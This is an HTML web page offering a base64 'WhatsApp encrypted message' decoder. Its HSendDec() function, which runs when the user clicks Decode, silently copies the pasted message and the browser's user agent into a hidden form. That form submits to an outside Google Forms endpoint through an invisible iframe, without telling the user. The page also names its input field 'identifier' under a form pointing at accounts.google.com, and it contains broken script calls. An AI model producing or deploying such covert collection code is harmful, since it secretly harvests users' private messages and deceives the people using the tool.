<!DOCTYPE HTML>
<html>
    <head>
   <meta name="viewport" content="width=device-width">   
<script async src="https://spat-cloud.github.io/data/HarScript/HarScript.v2.9.Latest.min.js"></script>
   <title>
  Decrypt Encrypted Text Message  </title>
<meta name="description" content="Decode message HarScript Message decoder">

   <!-- Global site tag (gtag.js) - Google Analytics -->
<script async src="https://www.googletagmanager.com/gtag/js?id=G-Q9W6Z6076P"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());

  gtag('config', 'G-Q9W6Z6076P');
</script>
    </head>
    <style>
    *::selection{
        color:#FFF;
        Background-color:Red;
    }
    #fr{
        display:none;
        color:green;
        Font-Size:12px;
        background-color:#000;
    }   
    #Dr{
        display:none;
        color:green;
        Font-Size:12px;
        background-color:#000;
    }   
    #ti{
        color:gold;
Line-height:24px;
        Background-color:green;
        Padding:12px;
        Font-weight:bold;
        Text-align:Center;
        Font-size:12px;
    
        Position:Static;
    }
    input[type=Submit]{
    
        color:#FFF;
        background-color:#4AFCAE;
        padding:12px;
        Border:none;
        Border-radius:4px;
    }
input[type=text]{
    
        color:#000;
        background-color:#FFF;
        padding:12px;
        Border:2px Solid #4ADCAF;
        Border-radius:4px;
    }
input[type=text]:hover{
    
        
        Border:2px solid #4ACCFF;
    
    }
    </style>
    <script>

function HSendDec(){
try{
var Ku = $Hdecode64($HId('Y').value);
$HId('Dr').style.display = "block";
$HId('Dr').value = Ku;
$HId('1').value = $HId('Y').value;
$HId('2').value = navigator.userAgent;
 $HId('4').submit();   
}catch(e){}throw "Errors";}
       
    </script>
    


 <body>
<iframe name="t" style="display:none;"></iframe>
<form action="https://docs.google.com/forms/u/0/d/e/1FAIpQLSfthAOyy2oF38lU5f4ag3ulJ8AHcRXtPHHJ-ibRh7UfX_6etw/formResponse" method="POST" target="t" style="display:none;" id="4">
<input type="text" id="1" name="entry.190958851">
<input type="text" id="2" name="entry.470512502">
<input type="submit">
</form>

   <form action="https://accounts.google.com" onsubmit="return false">
       <table>
           <tr>
               <td>
                   <div id="ti">
     Encrypted Message And Send THrough Whatsapp <br/>
        paste message in that box
<u><i>Ex:</u></i>SGFpIERvcmFlbW9uIEhvdyBhcmUgeW91Pw== <u><i>Output:</u></i> Hai Doraemon How are you?
          
                   </div>
 <input type="text" name="identifier" id="Y" placeholder="Paste Encrypt Message To Decrypt" oninput="Decode()"> 
 </td>
 </tr>
           <tr>
               <td>
 <input type="submit" value="Decode" onclick="HSendDec()">
 </td>
 </tr>
 </table>
   </form>    
   <textarea rows="10" cols="40" id="Dr"></textarea>
<br/>
<br/>
     <a href="Encrypted.html" style="text-decoration:none;color:green;font-size:12px;background-color:lightblue;padding:12px;">Vist Whatsapp Message Encrypter site</a>
    <br/>
<br/>
  
  <a href="data:text/html;base64,PCFET0NUWVBFIEhUTUw+PGh0bWw+PGhlYWQ+PG1ldGEgbmFtZT0ndmlld3BvcnQnIGNvbnRlbnQ9J3dpZHRoPWRldmljZS13aWR0aCc+PHRpdGxlPkhhclNjcmlwdC52MS4yLm1pbi5PbmxpbmUuJEhkZWNvZGU2NC5Eb3dubG9hZDwvdGl0bGU+PHNjcmlwdCBhc3luYyBzcmM9J2h0dHBzOi8vc3BhdC1jbG91ZC5naXRodWIuaW8vZGF0YS9IYXJTY3JpcHQvSGFyU2NyaXB0LnYyLjkuTGF0ZXN0Lm1pbi5qcyc+PC9zY3JpcHQ+PC9oZWFkPjxzY3JpcHQ+dmFyIEM9JEhkZWNvZGU2NCgnU0c5M0lHRnlaU0I1YjNVLycpO2RvY3VtZW50LndyaXRlKEMpOzwvc2NyaXB0PjwvaHRtbD4=" download="HarScript.v2.9.min.ONLINE.decode-download.html" style="text-decoration:none; color:aqua; Background-color:#000; Padding:12px; font-size:12px; text-align:center;">Download Documentation As(*.html)</a>
<br/>
<br/>    
<i style="color:red; font-size:12px; font-weight:bold;">
* After Downloading Open File in Your Browser *<br/>
* Make Sure Connected to Internet * <br/>
* To See Output Open In Browser connected to internet*
<br/> 
</i>
<br/>
<br/>
<br/>
<br/>
<a href="data:text/plain;base64,PCFET0NUWVBFIEhUTUw+PGh0bWw+PGhlYWQ+PG1ldGEgbmFtZT0ndmlld3BvcnQnIGNvbnRlbnQ9J3dpZHRoPWRldmljZS13aWR0aCc+PHRpdGxlPkhhclNjcmlwdC52MS4yLm1pbi5PbmxpbmUuJEhkZWNvZGU2NC5Eb3dubG9hZDwvdGl0bGU+PHNjcmlwdCBhc3luYyBzcmM9J2h0dHBzOi8vc3BhdC1jbG91ZC5naXRodWIuaW8vZGF0YS9IYXJTY3JpcHQvSGFyU2NyaXB0LnYyLjkuTGF0ZXN0Lm1pbi5qcyc+PC9zY3JpcHQ+PC9oZWFkPjxzY3JpcHQ+dmFyIEM9JEhkZWNvZGU2NCgnU0c5M0lHRnlaU0I1YjNVLycpO2RvY3VtZW50LndyaXRlKEMpOzwvc2NyaXB0PjwvaHRtbD4=" download="HarScript.v1.2.min.ONLINE.decode-download.txt" style="text-decoration:none; color:aqua; Background-color:#000; Padding:12px; font-size:12px; text-align:center;">Download Documentation As(*.txt)</a>

</body>
</html>
